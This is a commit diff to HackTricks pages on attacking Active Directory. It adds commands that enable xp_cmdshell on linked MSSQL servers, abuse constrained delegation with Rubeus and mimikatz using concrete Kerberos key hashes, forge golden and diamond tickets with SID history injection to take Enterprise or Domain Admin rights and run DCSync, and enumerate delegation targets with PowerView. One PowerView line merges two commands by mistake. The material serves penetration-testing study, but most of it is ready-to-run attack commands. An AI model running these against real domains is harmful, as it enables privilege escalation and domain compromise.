GitBook: [#3453] No subject

windows-hardening/active-directory-methodology/abusing-ad-mssql.md

@@ -149,6 +149,12 @@ Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
 
 #Manual trusted link queery
 Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
+## Enable xp_cmdshell and check it
+Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
+Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
+Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
+## If you see the results of @@selectname, it worked
+Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
 ```
 
 ### Metasploit

windows-hardening/active-directory-methodology/constrained-delegation.md

@@ -34,15 +34,17 @@ Also, **LDAP service access on DC**, is what is needed to exploit a **DCSync**.
 {% code title="Enumerate" %}
 ```bash
 # Powerview
-Get-DomainUser -TrustedToAuth
-Get-DomainComputer -TrustedToAuth
+Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
+Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
 
 #ADSearch
 ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
 ```
 {% endcode %}
 
-<pre class="language-bash" data-title="Get TGT"><code class="lang-bash"># The first step is to get a TGT of the service taht can impersonate others
+{% code title="Get TGT" %}
+```bash
+# The first step is to get a TGT of the service that can impersonate others
 ## If you are SYSTEM in the server, you might take it from memory
 .\Rubeus.exe triage
 .\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
@@ -52,12 +54,14 @@ ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))"
 mimikatz sekurlsa::ekeys
 
 ## Request with aes
-<strong>tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
-</strong>.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
+tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
 
 # Request with RC4
 tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
-.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi</code></pre>
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
+```
+{% endcode %}
 
 {% hint style="warning" %}
 There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** without being SYSTEM in the computer like the Printer Bug and unconstrain delegation, NTLM relaying and Active Directory Certificate Service abuse
@@ -77,7 +81,7 @@ There are **other ways to obtain a TGT ticket** or the **RC4** or **AES256** wit
 .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
 
 # Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
-\.Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
+.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
 
 #Load ticket in memory
 .\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local

windows-hardening/active-directory-methodology/sid-history-injection.md

@@ -16,11 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
+## Attack
+
 SID History was designed to support migration scenarios, where a user would be moved from one domain to another. To preserve access to resources in the "old" domain, the **user's previous SID would be added to the SID History** of their new account. So when creating such a ticket, the SID of a privileged group (EAs, DAs, etc) in the parent domain can be added that will **grant access to all resources in the parent**.
 
 This can be achieved using either a [**Golden**](sid-history-injection.md#golden-ticket) or [**Diamond Ticket**](sid-history-injection.md#diamond-ticket).
 
-For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in `S-1-5-21-<root domain>-519`. For example, from root domain SID `S-1-5-21-280534878-1496970234-700767426` the "Enterprise Admins"group SID is `S-1-5-21-280534878-1496970234-700767426-519`
+For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in `S-1-5-21-<root domain>-519`. For example, from root domain SID `S-1-5-21-280534878-1496970234-700767426` the **"Enterprise Admins"** group SID is `S-1-5-21-280534878-1496970234-700767426-519`
+
+You could also use the **Domain Admins** groups, which ends in **512**.
 
 Another way yo find the SID of a group of the other domain (for example "Domain Admins") is with:
 
@@ -28,22 +32,22 @@ Another way yo find the SID of a group of the other domain (for example "Domain
 Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid
 ```
 
-#### Golden Ticket
+### Golden Ticket (Mimikatz) with KRBTGT-AES256
 
-```powershell
-Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
-# /domain:<Current domain>
-# /sid:<SID of current domain>
-# /sids:<SID of the Enterprise Admins group of the parent domain>
-# /rc4:<Trusted key>
-# /aer256:<AES hash> - This or /rc4
-# /user:Administrator
-# /service:<target service>
-# /target:<Other domain>
-# /ticket:C:\path\save\ticket.kirbi
+```bash
+mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
 
-# Mimikatz example using aes and different TGT timings for opsec
-kerberos::golden /user:Administrator /domain:current.domain.io /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-1874506631-3219952063-538504511-512 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /startoffset:-10 /endin:600 /renewmax:10080 /ticket:doamin.kirbi
+/user is the username to impersonate.
+/domain is the current domain.
+/sid is the current domain SID.
+/sids is the SID of the target group to add ourselves to.
+/aes256 is the AES256 key of the current domain's krbtgt account.
+/startoffset sets the start time of the ticket to 10 mins before the current time.
+/endin sets the expiry date for the ticket to 60 mins.
+/renewmax sets how long the ticket can be valid for if renewed.
+
+# The previous command will generate a file called ticket.kirbi
+# Just loading you can perform a dcsync attack agains the domain
 ```
 
 For more info about golden tickets check:
@@ -52,7 +56,7 @@ For more info about golden tickets check:
 [golden-ticket.md](golden-ticket.md)
 {% endcontent-ref %}
 
-#### Diamond Ticket
+### Diamond Ticket (Rubeus + KRBTGT-AES256)
 
 ```powershell
 # Use the /sids param

windows-hardening/basic-powershell-for-pentesters/powerview.md

@@ -86,7 +86,7 @@ Get-ForestDomain
 Get-DomainUser -Properties name, MemberOf | fl
 ## Get-DomainUser and Get-NetUser are kind of the same
 Get-NetUser #Get users with several (not all) properties
-Get-NetUser | select -ExpandProperty samaccountname #List all usernames
+Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #List all usernames
 Get-NetUser -UserName student107 #Get info about a user
 Get-NetUser -properties name, description #Get all descriptions
 Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount  #Get all pwdlastset, logoncount and badpwdcount
@@ -101,7 +101,8 @@ Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
 Get-NetUser -PreauthNotRequired #ASREPRoastable users
 Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users
 Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostable
-Get-Netuser -TrustedToAuth #Useful for Kerberos constrain delegation
+Get-Netuser -TrustedToAuth Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
+Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto #Useful for Kerberos constrain delegation
 Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation
 # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
 Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {